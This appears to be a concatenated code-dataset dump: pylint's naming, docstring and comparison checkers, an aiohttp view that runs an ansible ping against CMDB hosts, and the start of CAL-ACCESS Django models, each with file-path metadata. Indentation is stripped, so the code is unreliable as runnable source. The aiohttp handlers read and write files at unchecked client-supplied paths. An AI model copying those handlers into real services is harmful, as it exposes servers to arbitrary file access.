dummy_variables_rgx = lint_utils.get_global_option(
self, "dummy-variables-rgx", default=None
)
for target in targets:
if not isinstance(target, astroid.Tuple):
continue
found_names = []
for element in target.elts:
if isinstance(element, astroid.Tuple):
self._check_redeclared_assign_name([element])
elif isinstance(element, astroid.AssignName) and element.name != "_":
if dummy_variables_rgx and dummy_variables_rgx.match(element.name):
return
found_names.append(element.name)
names = collections.Counter(found_names)
for name, count in names.most_common():
if count > 1:
self.add_message(
"redeclared-assigned-name", args=(name,), node=target
)
@utils.check_messages("self-assigning-variable", "redeclared-assigned-name")
def visit_assign(self, node):
self._check_self_assigning_variable(node)
self._check_redeclared_assign_name(node.targets)
@utils.check_messages("redeclared-assigned-name")
def visit_for(self, node):
self._check_redeclared_assign_name([node.target])
KNOWN_NAME_TYPES = {
"module",
"const",
"class",
"function",
"method",
"attr",
"argument",
"variable",
"class_attribute",
"class_const",
"inlinevar",
}
HUMAN_READABLE_TYPES = {
"module": "module",
"const": "constant",
"class": "class",
"function": "function",
"method": "method",
"attr": "attribute",
"argument": "argument",
"variable": "variable",
"class_attribute": "class attribute",
"class_const": "class constant",
"inlinevar": "inline iteration",
}
DEFAULT_NAMING_STYLES = {
"module": "snake_case",
"const": "UPPER_CASE",
"class": "PascalCase",
"function": "snake_case",
"method": "snake_case",
"attr": "snake_case",
"argument": "snake_case",
"variable": "snake_case",
"class_attribute": "any",
"class_const": "UPPER_CASE",
"inlinevar": "any",
}
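# Illustrative sketch (hypothetical values) of what _create_naming_options()
# below generates for each name type, e.g. for "class":
#     --class-naming-style=<style>   (default "PascalCase", one of NAMING_STYLES)
#     --class-rgx=<regexp>           (overrides class-naming-style when given)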
def _create_naming_options():
name_options = []
for name_type in sorted(KNOWN_NAME_TYPES):
human_readable_name = HUMAN_READABLE_TYPES[name_type]
default_style = DEFAULT_NAMING_STYLES[name_type]
name_type = name_type.replace("_", "-")
name_options.append(
(
f"{name_type}-naming-style",
{
"default": default_style,
"type": "choice",
"choices": list(NAMING_STYLES.keys()),
"metavar": "<style>",
"help": "Naming style matching correct %s names."
% (human_readable_name,),
},
)
)
name_options.append(
(
f"{name_type}-rgx",
{
"default": None,
"type": "regexp",
"metavar": "<regexp>",
"help": "Regular expression matching correct %s names. Overrides %s-naming-style."
% (human_readable_name, name_type),
},
)
)
return tuple(name_options)
class NameChecker(_BasicChecker):
msgs = {
"C0103": (
'%s name "%s" doesn\'t conform to %s',
"invalid-name",
"Used when the name doesn't conform to naming rules "
"associated to its type (constant, variable, class...).",
),
"C0104": (
'Disallowed name "%s"',
"disallowed-name",
"Used when the name matches bad-names or bad-names-rgxs- (unauthorized names).",
{
"old_names": [
("C0102", "blacklisted-name"),
]
},
),
"C0144": (
'%s name "%s" contains a non-ASCII unicode character',
"non-ascii-name",
"Used when the name contains at least one non-ASCII unicode character.",
),
"W0111": (
"Name %s will become a keyword in Python %s",
"assign-to-new-keyword",
"Used when assignment will become invalid in future "
"Python release due to introducing new keyword.",
),
}
options = (
(
"good-names",
{
"default": ("i", "j", "k", "ex", "Run", "_"),
"type": "csv",
"metavar": "<names>",
"help": "Good variable names which should always be accepted,"
" separated by a comma.",
},
),
(
"good-names-rgxs",
{
"default": "",
"type": "regexp_csv",
"metavar": "<names>",
"help": "Good variable names regexes, separated by a comma. If names match any regex,"
" they will always be accepted",
},
),
(
"bad-names",
{
"default": ("foo", "bar", "baz", "toto", "tutu", "tata"),
"type": "csv",
"metavar": "<names>",
"help": "Bad variable names which should always be refused, "
"separated by a comma.",
},
),
(
"bad-names-rgxs",
{
"default": "",
"type": "regexp_csv",
"metavar": "<names>",
"help": "Bad variable names regexes, separated by a comma. If names match any regex,"
" they will always be refused",
},
),
(
"name-group",
{
"default": (),
"type": "csv",
"metavar": "<name1:name2>",
"help": (
"Colon-delimited sets of names that determine each"
" other's naming style when the name regexes"
" allow several styles."
),
},
),
(
"include-naming-hint",
{
"default": False,
"type": "yn",
"metavar": "<y_or_n>",
"help": "Include a hint for the correct naming format with invalid-name.",
},
),
(
"property-classes",
{
"default": ("abc.abstractproperty",),
"type": "csv",
"metavar": "<decorator names>",
"help": "List of decorators that produce properties, such as "
"abc.abstractproperty. Add to this list to register "
"other decorators that produce valid properties. "
"These decorators are taken in consideration only for invalid-name.",
},
),
) + _create_naming_options()
KEYWORD_ONSET = {(3, 7): {"async", "await"}}
def __init__(self, linter):
_BasicChecker.__init__(self, linter)
self._name_category = {}
self._name_group = {}
self._bad_names = {}
self._name_regexps = {}
self._name_hints = {}
self._good_names_rgxs_compiled = []
self._bad_names_rgxs_compiled = []
self._non_ascii_rgx_compiled = re.compile("[^\u0000-\u007F]")
def open(self):
self.stats = self.linter.add_stats(
badname_module=0,
badname_class=0,
badname_function=0,
badname_method=0,
badname_attr=0,
badname_const=0,
badname_variable=0,
badname_inlinevar=0,
badname_argument=0,
badname_class_attribute=0,
badname_class_const=0,
)
for group in self.config.name_group:
for name_type in group.split(":"):
self._name_group[name_type] = f"group_{group}"
regexps, hints = self._create_naming_rules()
self._name_regexps = regexps
self._name_hints = hints
self._good_names_rgxs_compiled = [
re.compile(rgxp) for rgxp in self.config.good_names_rgxs
]
self._bad_names_rgxs_compiled = [
re.compile(rgxp) for rgxp in self.config.bad_names_rgxs
]
def _create_naming_rules(self):
regexps = {}
hints = {}
for name_type in KNOWN_NAME_TYPES:
naming_style_option_name = f"{name_type}_naming_style"
naming_style_name = getattr(self.config, naming_style_option_name)
regexps[name_type] = NAMING_STYLES[naming_style_name].get_regex(name_type)
custom_regex_setting_name = f"{name_type}_rgx"
custom_regex = getattr(self.config, custom_regex_setting_name, None)
if custom_regex is not None:
regexps[name_type] = custom_regex
if custom_regex is not None:
hints[name_type] = "%r pattern" % custom_regex.pattern
else:
hints[name_type] = "%s naming style" % naming_style_name
return regexps, hints
@utils.check_messages("disallowed-name", "invalid-name", "non-ascii-name")
def visit_module(self, node):
self._check_name("module", node.name.split(".")[-1], node)
self._bad_names = {}
def leave_module(self, node): # pylint: disable=unused-argument
for all_groups in self._bad_names.values():
if len(all_groups) < 2:
continue
groups = collections.defaultdict(list)
min_warnings = sys.maxsize
for group in all_groups.values():
groups[len(group)].append(group)
min_warnings = min(len(group), min_warnings)
if len(groups[min_warnings]) > 1:
by_line = sorted(
groups[min_warnings],
key=lambda group: min(warning[0].lineno for warning in group),
)
warnings = itertools.chain(*by_line[1:])
else:
warnings = groups[min_warnings][0]
for args in warnings:
self._raise_name_warning(*args)
@utils.check_messages(
"disallowed-name", "invalid-name", "assign-to-new-keyword", "non-ascii-name"
)
def visit_classdef(self, node):
self._check_assign_to_new_keyword_violation(node.name, node)
self._check_name("class", node.name, node)
for attr, anodes in node.instance_attrs.items():
if not any(node.instance_attr_ancestors(attr)):
self._check_name("attr", attr, anodes[0])
@utils.check_messages(
"disallowed-name", "invalid-name", "assign-to-new-keyword", "non-ascii-name"
)
def visit_functiondef(self, node):
# Do not emit any warnings if the method is just an implementation
# of a base class method.
self._check_assign_to_new_keyword_violation(node.name, node)
confidence = interfaces.HIGH
if node.is_method():
if utils.overrides_a_method(node.parent.frame(), node.name):
return
confidence = (
interfaces.INFERENCE
if utils.has_known_bases(node.parent.frame())
else interfaces.INFERENCE_FAILURE
)
self._check_name(
_determine_function_name_type(node, config=self.config),
node.name,
node,
confidence,
)
# Check argument names
args = node.args.args
if args is not None:
self._recursive_check_names(args, node)
visit_asyncfunctiondef = visit_functiondef
@utils.check_messages("disallowed-name", "invalid-name", "non-ascii-name")
def visit_global(self, node):
for name in node.names:
self._check_name("const", name, node)
@utils.check_messages(
"disallowed-name", "invalid-name", "assign-to-new-keyword", "non-ascii-name"
)
def visit_assignname(self, node):
"""check module level assigned names"""
self._check_assign_to_new_keyword_violation(node.name, node)
frame = node.frame()
assign_type = node.assign_type()
if isinstance(assign_type, astroid.Comprehension):
self._check_name("inlinevar", node.name, node)
elif isinstance(frame, astroid.Module):
if isinstance(assign_type, astroid.Assign):
if isinstance(utils.safe_infer(assign_type.value), astroid.ClassDef):
self._check_name("class", node.name, node)
# Don't emit if the name redefines an import
# in an ImportError except handler.
elif not _redefines_import(node) and isinstance(
utils.safe_infer(assign_type.value), astroid.Const
):
self._check_name("const", node.name, node)
elif isinstance(assign_type, astroid.ExceptHandler):
self._check_name("variable", node.name, node)
elif isinstance(
assign_type, astroid.AnnAssign
) and utils.is_assign_name_annotated_with(node, "Final"):
self._check_name("const", node.name, node)
elif isinstance(frame, astroid.FunctionDef):
            # globally introduced variables aren't in the function locals
if node.name in frame and node.name not in frame.argnames():
if not _redefines_import(node):
self._check_name("variable", node.name, node)
elif isinstance(frame, astroid.ClassDef):
if not list(frame.local_attr_ancestors(node.name)):
for ancestor in frame.ancestors():
if (
ancestor.name == "Enum"
and ancestor.root().name == "enum"
or utils.is_assign_name_annotated_with(node, "Final")
):
self._check_name("class_const", node.name, node)
break
else:
self._check_name("class_attribute", node.name, node)
def _recursive_check_names(self, args, node):
"""check names in a possibly recursive list <arg>"""
for arg in args:
if isinstance(arg, astroid.AssignName):
self._check_name("argument", arg.name, node)
else:
self._recursive_check_names(arg.elts, node)
def _find_name_group(self, node_type):
return self._name_group.get(node_type, node_type)
def _raise_name_warning(
self, node, node_type, name, confidence, warning="invalid-name"
):
type_label = HUMAN_READABLE_TYPES[node_type]
hint = self._name_hints[node_type]
if self.config.include_naming_hint:
hint += " (%r pattern)" % self._name_regexps[node_type].pattern
args = (
(type_label.capitalize(), name, hint)
if warning == "invalid-name"
else (type_label.capitalize(), name)
)
self.add_message(warning, node=node, args=args, confidence=confidence)
self.stats["badname_" + node_type] += 1
def _name_allowed_by_regex(self, name: str) -> bool:
return name in self.config.good_names or any(
pattern.match(name) for pattern in self._good_names_rgxs_compiled
)
def _name_disallowed_by_regex(self, name: str) -> bool:
return name in self.config.bad_names or any(
pattern.match(name) for pattern in self._bad_names_rgxs_compiled
)
def _check_name(self, node_type, name, node, confidence=interfaces.HIGH):
"""check for a name using the type's regexp"""
non_ascii_match = self._non_ascii_rgx_compiled.match(name)
if non_ascii_match is not None:
self._raise_name_warning(
node, node_type, name, confidence, warning="non-ascii-name"
)
def _should_exempt_from_invalid_name(node):
if node_type == "variable":
inferred = utils.safe_infer(node)
if isinstance(inferred, astroid.ClassDef):
return True
return False
if utils.is_inside_except(node):
clobbering, _ = utils.clobber_in_except(node)
if clobbering:
return
if self._name_allowed_by_regex(name=name):
return
if self._name_disallowed_by_regex(name=name):
self.stats["badname_" + node_type] += 1
self.add_message("disallowed-name", node=node, args=name)
return
regexp = self._name_regexps[node_type]
match = regexp.match(name)
if _is_multi_naming_match(match, node_type, confidence):
name_group = self._find_name_group(node_type)
bad_name_group = self._bad_names.setdefault(name_group, {})
warnings = bad_name_group.setdefault(match.lastgroup, [])
warnings.append((node, node_type, name, confidence))
if match is None and not _should_exempt_from_invalid_name(node):
self._raise_name_warning(node, node_type, name, confidence)
def _check_assign_to_new_keyword_violation(self, name, node):
keyword_first_version = self._name_became_keyword_in_version(
name, self.KEYWORD_ONSET
)
if keyword_first_version is not None:
self.add_message(
"assign-to-new-keyword",
node=node,
args=(name, keyword_first_version),
confidence=interfaces.HIGH,
)
@staticmethod
def _name_became_keyword_in_version(name, rules):
for version, keywords in rules.items():
if name in keywords and sys.version_info < version:
return ".".join(str(v) for v in version)
return None
class DocStringChecker(_BasicChecker):
msgs = {
"C0112": (
"Empty %s docstring",
"empty-docstring",
"Used when a module, function, class or method has an empty "
"docstring (it would be too easy ;).",
{"old_names": [("W0132", "old-empty-docstring")]},
),
"C0114": (
"Missing module docstring",
"missing-module-docstring",
"Used when a module has no docstring."
"Empty modules do not require a docstring.",
{"old_names": [("C0111", "missing-docstring")]},
),
"C0115": (
"Missing class docstring",
"missing-class-docstring",
"Used when a class has no docstring."
"Even an empty class must have a docstring.",
{"old_names": [("C0111", "missing-docstring")]},
),
"C0116": (
"Missing function or method docstring",
"missing-function-docstring",
"Used when a function or method has no docstring."
"Some special methods like __init__ do not require a "
"docstring.",
{"old_names": [("C0111", "missing-docstring")]},
),
}
options = (
(
"no-docstring-rgx",
{
"default": NO_REQUIRED_DOC_RGX,
"type": "regexp",
"metavar": "<regexp>",
"help": "Regular expression which should only match "
"function or class names that do not require a "
"docstring.",
},
),
(
"docstring-min-length",
{
"default": -1,
"type": "int",
"metavar": "<int>",
"help": (
"Minimum line length for functions/classes that"
" require docstrings, shorter ones are exempt."
),
},
),
)
def open(self):
self.stats = self.linter.add_stats(
undocumented_module=0,
undocumented_function=0,
undocumented_method=0,
undocumented_class=0,
)
@utils.check_messages("missing-docstring", "empty-docstring")
def visit_module(self, node):
self._check_docstring("module", node)
@utils.check_messages("missing-docstring", "empty-docstring")
def visit_classdef(self, node):
if self.config.no_docstring_rgx.match(node.name) is None:
self._check_docstring("class", node)
@utils.check_messages("missing-docstring", "empty-docstring")
def visit_functiondef(self, node):
if self.config.no_docstring_rgx.match(node.name) is None:
ftype = "method" if node.is_method() else "function"
if (
is_property_setter(node)
or is_property_deleter(node)
or is_overload_stub(node)
):
return
if isinstance(node.parent.frame(), astroid.ClassDef):
overridden = False
confidence = (
interfaces.INFERENCE
if utils.has_known_bases(node.parent.frame())
else interfaces.INFERENCE_FAILURE
)
# check if node is from a method overridden by its ancestor
for ancestor in node.parent.frame().ancestors():
if node.name in ancestor and isinstance(
ancestor[node.name], astroid.FunctionDef
):
overridden = True
break
self._check_docstring(
ftype, node, report_missing=not overridden, confidence=confidence
)
elif isinstance(node.parent.frame(), astroid.Module):
self._check_docstring(ftype, node)
else:
return
visit_asyncfunctiondef = visit_functiondef
def _check_docstring(
self, node_type, node, report_missing=True, confidence=interfaces.HIGH
):
"""check the node has a non empty docstring"""
docstring = node.doc
if docstring is None:
docstring = _infer_dunder_doc_attribute(node)
if docstring is None:
if not report_missing:
return
lines = utils.get_node_last_lineno(node) - node.lineno
if node_type == "module" and not lines:
# If the module has no body, there's no reason
# to require a docstring.
return
max_lines = self.config.docstring_min_length
if node_type != "module" and max_lines > -1 and lines < max_lines:
return
self.stats["undocumented_" + node_type] += 1
if (
node.body
and isinstance(node.body[0], astroid.Expr)
and isinstance(node.body[0].value, astroid.Call)
):
# Most likely a string with a format call. Let's see.
func = utils.safe_infer(node.body[0].value.func)
if isinstance(func, astroid.BoundMethod) and isinstance(
func.bound, astroid.Instance
):
# Strings.
if func.bound.name in ("str", "unicode", "bytes"):
return
if node_type == "module":
message = "missing-module-docstring"
elif node_type == "class":
message = "missing-class-docstring"
else:
message = "missing-function-docstring"
self.add_message(message, node=node, confidence=confidence)
elif not docstring.strip():
self.stats["undocumented_" + node_type] += 1
self.add_message(
"empty-docstring", node=node, args=(node_type,), confidence=confidence
)
class PassChecker(_BasicChecker):
"""check if the pass statement is really necessary"""
msgs = {
"W0107": (
"Unnecessary pass statement",
"unnecessary-pass",
'Used when a "pass" statement that can be avoided is encountered.',
)
}
@utils.check_messages("unnecessary-pass")
def visit_pass(self, node):
if len(node.parent.child_sequence(node)) > 1 or (
isinstance(node.parent, (astroid.ClassDef, astroid.FunctionDef))
and (node.parent.doc is not None)
):
self.add_message("unnecessary-pass", node=node)
def _is_one_arg_pos_call(call):
"""Is this a call with exactly 1 argument,
where that argument is positional?
"""
return isinstance(call, astroid.Call) and len(call.args) == 1 and not call.keywords
def _infer_dunder_doc_attribute(node):
# Try to see if we have a `__doc__` attribute.
try:
docstring = node["__doc__"]
except KeyError:
return None
docstring = utils.safe_infer(docstring)
if not docstring:
return None
if not isinstance(docstring, astroid.Const):
return None
return docstring.value
class ComparisonChecker(_BasicChecker):
"""Checks for comparisons
- singleton comparison: 'expr == True', 'expr == False' and 'expr == None'
- yoda condition: 'const "comp" right' where comp can be '==', '!=', '<',
'<=', '>' or '>=', and right can be a variable, an attribute, a method or
a function
"""
msgs = {
"C0121": (
"Comparison %s should be %s",
"singleton-comparison",
"Used when an expression is compared to singleton "
"values like True, False or None.",
),
"C0122": (
"Comparison should be %s",
"misplaced-comparison-constant",
"Used when the constant is placed on the left side "
"of a comparison. It is usually clearer in intent to "
"place it in the right hand side of the comparison.",
),
"C0123": (
"Use isinstance() rather than type() for a typecheck.",
"unidiomatic-typecheck",
"The idiomatic way to perform an explicit typecheck in "
"Python is to use isinstance(x, Y) rather than "
"type(x) == Y, type(x) is Y. Though there are unusual "
"situations where these give different results.",
{"old_names": [("W0154", "old-unidiomatic-typecheck")]},
),
"R0123": (
"Comparison to literal",
"literal-comparison",
"Used when comparing an object to a literal, which is usually "
"what you do not want to do, since you can compare to a different "
"literal than what was expected altogether.",
),
"R0124": (
"Redundant comparison - %s",
"comparison-with-itself",
"Used when something is compared against itself.",
),
"W0143": (
"Comparing against a callable, did you omit the parenthesis?",
"comparison-with-callable",
"This message is emitted when pylint detects that a comparison with a "
"callable was made, which might suggest that some parenthesis were omitted, "
"resulting in potential unwanted behaviour.",
),
"W0177": (
"Comparison %s should be %s",
"nan-comparison",
"Used when an expression is compared to NaN"
"values like numpy.NaN and float('nan')",
),
}
def _check_singleton_comparison(
self, left_value, right_value, root_node, checking_for_absence: bool = False
):
"""Check if == or != is being used to compare a singleton value"""
singleton_values = (True, False, None)
def _is_singleton_const(node) -> bool:
return isinstance(node, astroid.Const) and any(
node.value is value for value in singleton_values
)
if _is_singleton_const(left_value):
singleton, other_value = left_value.value, right_value
elif _is_singleton_const(right_value):
singleton, other_value = right_value.value, left_value
else:
return
singleton_comparison_example = {False: "'{} is {}'", True: "'{} is not {}'"}
# True/False singletons have a special-cased message in case the user is
# mistakenly using == or != to check for truthiness
if singleton in (True, False):
suggestion_template = (
"{} if checking for the singleton value {}, or {} if testing for {}"
)
truthiness_example = {False: "not {}", True: "{}"}
truthiness_phrase = {True: "truthiness", False: "falsiness"}
# Looks for comparisons like x == True or x != False
checking_truthiness = singleton is not checking_for_absence
suggestion = suggestion_template.format(
singleton_comparison_example[checking_for_absence].format(
left_value.as_string(), right_value.as_string()
),
singleton,
(
"'bool({})'"
if not utils.is_test_condition(root_node) and checking_truthiness
else "'{}'"
).format(
truthiness_example[checking_truthiness].format(
other_value.as_string()
)
),
truthiness_phrase[checking_truthiness],
)
else:
suggestion = singleton_comparison_example[checking_for_absence].format(
left_value.as_string(), right_value.as_string()
)
self.add_message(
"singleton-comparison",
node=root_node,
args=(f"'{root_node.as_string()}'", suggestion),
)
def _check_nan_comparison(
self, left_value, right_value, root_node, checking_for_absence: bool = False
):
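        # Illustrative examples (hypothetical code): NaN never compares equal
        # to itself, so these tests are misleading:
        #     if x == float("nan"):    # nan-comparison; suggest math.isnan(x)
        #     if x is numpy.NaN:       # nan-comparison; suggest math.isnan(x)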
def _is_float_nan(node):
try:
if isinstance(node, astroid.Call) and len(node.args) == 1:
if (
node.args[0].value.lower() == "nan"
and node.inferred()[0].pytype() == "builtins.float"
):
return True
return False
except AttributeError:
return False
def _is_numpy_nan(node):
if isinstance(node, astroid.Attribute) and node.attrname == "NaN":
if isinstance(node.expr, astroid.Name):
return node.expr.name in ("numpy", "nmp", "np")
return False
def _is_nan(node) -> bool:
return _is_float_nan(node) or _is_numpy_nan(node)
nan_left = _is_nan(left_value)
if not nan_left and not _is_nan(right_value):
return
absence_text = ""
if checking_for_absence:
absence_text = "not "
if nan_left:
suggestion = f"'{absence_text}math.isnan({right_value.as_string()})'"
else:
suggestion = f"'{absence_text}math.isnan({left_value.as_string()})'"
self.add_message(
"nan-comparison",
node=root_node,
args=(f"'{root_node.as_string()}'", suggestion),
)
def _check_literal_comparison(self, literal, node):
"""Check if we compare to a literal, which is usually what we do not want to do."""
nodes = (astroid.List, astroid.Tuple, astroid.Dict, astroid.Set)
is_other_literal = isinstance(literal, nodes)
is_const = False
if isinstance(literal, astroid.Const):
if isinstance(literal.value, bool) or literal.value is None:
                # Not interested in these values.
return
is_const = isinstance(literal.value, (bytes, str, int, float))
if is_const or is_other_literal:
self.add_message("literal-comparison", node=node)
def _check_misplaced_constant(self, node, left, right, operator):
if isinstance(right, astroid.Const):
return
operator = REVERSED_COMPS.get(operator, operator)
suggestion = f"{right.as_string()} {operator} {left.value!r}"
self.add_message("misplaced-comparison-constant", node=node, args=(suggestion,))
def _check_logical_tautology(self, node):
"""Check if identifier is compared against itself.
:param node: Compare node
:type node: astroid.node_classes.Compare
:Example:
val = 786
if val == val: # [comparison-with-itself]
pass
"""
left_operand = node.left
right_operand = node.ops[0][1]
operator = node.ops[0][0]
if isinstance(left_operand, astroid.Const) and isinstance(
right_operand, astroid.Const
):
left_operand = left_operand.value
right_operand = right_operand.value
elif isinstance(left_operand, astroid.Name) and isinstance(
right_operand, astroid.Name
):
left_operand = left_operand.name
right_operand = right_operand.name
if left_operand == right_operand:
suggestion = f"{left_operand} {operator} {right_operand}"
self.add_message("comparison-with-itself", node=node, args=(suggestion,))
def _check_callable_comparison(self, node):
operator = node.ops[0][0]
if operator not in COMPARISON_OPERATORS:
return
bare_callables = (astroid.FunctionDef, astroid.BoundMethod)
left_operand, right_operand = node.left, node.ops[0][1]
        # this message should be emitted only when there is a comparison of a
        # bare callable with a non-bare callable.
if (
sum(
1
for operand in (left_operand, right_operand)
if isinstance(utils.safe_infer(operand), bare_callables)
)
== 1
):
self.add_message("comparison-with-callable", node=node)
@utils.check_messages(
"singleton-comparison",
"misplaced-comparison-constant",
"unidiomatic-typecheck",
"literal-comparison",
"comparison-with-itself",
"comparison-with-callable",
)
def visit_compare(self, node):
self._check_callable_comparison(node)
self._check_logical_tautology(node)
self._check_unidiomatic_typecheck(node)
# NOTE: this checker only works with binary comparisons like 'x == 42'
# but not 'x == y == 42'
if len(node.ops) != 1:
return
left = node.left
operator, right = node.ops[0]
if operator in COMPARISON_OPERATORS and isinstance(left, astroid.Const):
self._check_misplaced_constant(node, left, right, operator)
if operator in ("==", "!="):
self._check_singleton_comparison(
left, right, node, checking_for_absence=operator == "!="
)
if operator in ("==", "!=", "is", "is not"):
self._check_nan_comparison(
left, right, node, checking_for_absence=operator in ("!=", "is not")
)
if operator in ("is", "is not"):
self._check_literal_comparison(right, node)
def _check_unidiomatic_typecheck(self, node):
operator, right = node.ops[0]
if operator in TYPECHECK_COMPARISON_OPERATORS:
left = node.left
if _is_one_arg_pos_call(left):
self._check_type_x_is_y(node, left, operator, right)
def _check_type_x_is_y(self, node, left, operator, right):
"""Check for expressions like type(x) == Y."""
left_func = utils.safe_infer(left.func)
if not (
isinstance(left_func, astroid.ClassDef) and left_func.qname() == TYPE_QNAME
):
return
if operator in ("is", "is not") and _is_one_arg_pos_call(right):
right_func = utils.safe_infer(right.func)
if (
isinstance(right_func, astroid.ClassDef)
and right_func.qname() == TYPE_QNAME
):
# type(x) == type(a)
right_arg = utils.safe_infer(right.args[0])
if not isinstance(right_arg, LITERAL_NODE_TYPES):
# not e.g. type(x) == type([])
return
self.add_message("unidiomatic-typecheck", node=node)
def register(linter):
"""required method to auto register this checker"""
linter.register_checker(BasicErrorChecker(linter))
linter.register_checker(BasicChecker(linter))
linter.register_checker(NameChecker(linter))
linter.register_checker(DocStringChecker(linter))
linter.register_checker(PassChecker(linter))
linter.register_checker(ComparisonChecker(linter))
| venv/lib/python3.8/site-packages/pylint/checkers/base.py | 100,471 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
# @Time : 2020-01-16 15:53
# @Author : 行颠
# @Email : 0xe590b4@gmail.com
# @File : view
# @Software: view
# @DATA : 2020-01-16
"""
import os
import asyncio
import motor.motor_asyncio
import aiohttp
from aiohttp import web
import aiohttp_jinja2
import json
import jinja2
from apps.config import *
import subprocess, shlex
from apps.ansible_config import get_ansible_hosts_data
@aiohttp_jinja2.template('package/package.html')
async def handler_package(request):
return {'name': 'Andrew', 'age': 'Svetlov'}
@aiohttp_jinja2.template('package/workflow.html')
async def handler_package_workflow(request):
return {'name': 'Andrew', 'age': 'Svetlov'}
async def handler_package_workflow_roles(request):
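    # Return the roles list from the playbook YAML at the POSTed "path";
    # read_yaml_file presumably comes from apps.config via the wildcard import above.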
post = await request.post()
result = read_yaml_file(post['path'])
roles = result[0]['roles']
return web.json_response(roles)
async def handler_package_ansible_list(request):
dir_path = request.app['settings'].ansible_package_workspace
result = get_tree(dir_path)
return web.json_response(result)
async def handler_package_ansible_read(request):
post = await request.post()
data = read_t_file(post['filename'])
return web.json_response({"code": 1, "data": data})
async def handler_package_ansible_write(request):
post = await request.post()
data = write_t_file(post['path'], post['code'])
return web.json_response({"code": 1, "data": data})
async def handler_package_ws_ansible_run(request):
ws = web.WebSocketResponse()
cmdb = request.app['cmdb']
await ws.prepare(request)
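    # Message protocol: each text frame carries JSON with the diagram state
    # ("query") and the selected playbook path ("path"). Node entries that have
    # both "role" and "data" are turned into a Mongo $or query against the CMDB,
    # the matching hosts are written to a temporary ansible inventory, and the
    # command's output is streamed back to the client line by line.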
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
if msg.data == 'close':
await ws.close()
else:
msg_data = json.loads(msg.data)
params = []
query_data = json.loads(msg_data['query'])
for i in query_data['nodeDataArray']:
if i.get("role", None) and i.get("data", None):
params.append(i.get("data"))
await ws.send_str(">> {} \r\n".format(json.dumps({"$or": params})))
# await ws.send_json({"$or":params})
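                # Debug aid: dump the assembled CMDB query to the server log.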
import pprint
pprint.pprint({"$or": params})
result = cmdb.assets.find({"$or": params})
hosts = []
for host in await result.to_list(length=1000):
hosts.append(host)
hosts_file = get_ansible_hosts_data(hosts)
work_path = os.path.dirname(os.path.abspath(msg_data['path']))
command = "ansible -i {} all -m ping".format(hosts_file)
await ws.send_str(">> {} \r\n".format(command))
await ws.send_str(">> {} \r\n".format("result:"))
                # Brief pause so the header lines reach the client before output
                # streams; use asyncio.sleep so the event loop is not blocked.
                await asyncio.sleep(1)
p = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, cwd=work_path)
                # Stream output in real time. stderr was merged into stdout above,
                # so only stdout needs to be read; note that readline() here is
                # synchronous and blocks the event loop while ansible runs (see the
                # asyncio-based sketch after this handler).
                while p.poll() is None:
                    out = p.stdout.readline().strip()
                    if out:
                        # print("sub process output: ", out)
                        await ws.send_str(out.decode(encoding='utf-8', errors='strict'))
                # Subprocess return code
                await ws.send_str("return code: {} ".format(p.returncode))
return ws
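# A minimal non-blocking alternative (sketch only, not wired into any route):
# the handler above reads the subprocess with a synchronous readline(), which
# stalls the aiohttp event loop while ansible runs. asyncio's subprocess API
# avoids that. The helper name _stream_command is hypothetical and assumes the
# same command/work_path values built inside the handler.
async def _stream_command(ws, command, work_path):
    proc = await asyncio.create_subprocess_exec(
        *shlex.split(command),
        cwd=work_path,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.STDOUT,
    )
    while True:
        line = await proc.stdout.readline()
        if not line:
            break
        await ws.send_str(line.decode('utf-8', errors='replace'))
    await proc.wait()
    await ws.send_str("return code: {} ".format(proc.returncode))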
| apps/package/view.py | 3,727 | # @Time : 2020-01-16 15:53
# @Author : 行颠
# @Email : 0xe590b4@gmail.com
# @File : view
# @Software: view
# @DATA : 2020-01-16
!/usr/bin/python3 -*- coding: utf-8 -*- await ws.send_json({"$or":params}) Stream output in real time print("sub process err: ", err) print("sub process output: ", out) Subprocess return code | 295 | en | 0.270924 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Models for storing inactive and deprecated tables from the CAL-ACCESS database.
"""
from __future__ import unicode_literals
# Models
from django.db import models
from calaccess_raw import fields
from .base import CalAccessBaseModel
from django.utils.encoding import python_2_unicode_compatible
# Annotations
from calaccess_raw import annotations
from calaccess_raw.annotations import DocumentCloud
@python_2_unicode_compatible
class BallotMeasuresCd(CalAccessBaseModel):
"""
Ballot-measure dates and times.
"""
UNIQUE_KEY = "FILER_ID"
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=7),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=19),
]
election_date = fields.DateField(
db_column='ELECTION_DATE',
null=True,
help_text="Ballot measure election date"
)
filer_id = fields.IntegerField(
verbose_name='filer ID',
db_column='FILER_ID',
null=True,
db_index=True,
help_text="Filer's unique identification number",
)
measure_no = fields.CharField(
db_column='MEASURE_NO',
max_length=2,
help_text="Ballot measure number"
)
measure_name = fields.CharField(
db_column='MEASURE_NAME',
max_length=163,
help_text="Ballot measure full name"
)
measure_short_name = fields.CharField(
db_column='MEASURE_SHORT_NAME',
max_length=50,
blank=True,
help_text="Ballot measure short name"
)
jurisdiction = fields.CharField(
db_column='JURISDICTION',
max_length=9,
help_text="This field is undocumented"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'BALLOT_MEASURES_CD'
ordering = (
"-election_date",
"measure_no",
"measure_short_name",
"measure_name"
)
def __str__(self):
return self.measure_name
@python_2_unicode_compatible
class CvrF470Cd(CalAccessBaseModel):
"""
The cover page for officeholder and candidate short and supplemental forms.
"""
UNIQUE_KEY = (
"FILING_ID",
"AMEND_ID",
"REC_TYPE",
"FORM_TYPE",
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=8),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=30, end_page=32),
DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=15, end_page=16),
DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22),
DocumentCloud(id='2712034-Cal-Format-201', start_page=29, end_page=30),
]
FILING_FORMS = [
annotations.get_form('F470'),
]
amend_id = fields.IntegerField(
db_column="AMEND_ID",
db_index=True,
help_text="Amendment Identification number. A number of 0 is an original filing and 1 "
"to 999 amendments."
)
cand_adr1 = fields.CharField(
db_column="CAND_ADR1",
blank=True,
max_length=55,
